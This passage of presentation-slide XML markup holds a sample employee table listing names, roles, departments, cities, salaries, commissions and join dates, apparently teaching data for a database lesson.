                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EmpName</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Role</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DeptNo</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DeptName</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DeptLoc</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Salary</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Commision</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DOJ</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>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 sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>JONES</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>manager</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>HR</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Mumbai</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>25000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1000</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1980-01-29</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>SMITH</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>clerk</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>2</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Accounts</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Delhi</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>10000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1984-02-10</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>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lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>WARD</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>analyst</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1</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Accounts</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Banglore</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>15000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>500</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1981-10-10</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>JITESH</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>salesman</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>6</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Sales</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Pune</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>18000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1500</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1983-12-25</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>ANIL</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salesman</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Sales</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Noida</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>22000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>2000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
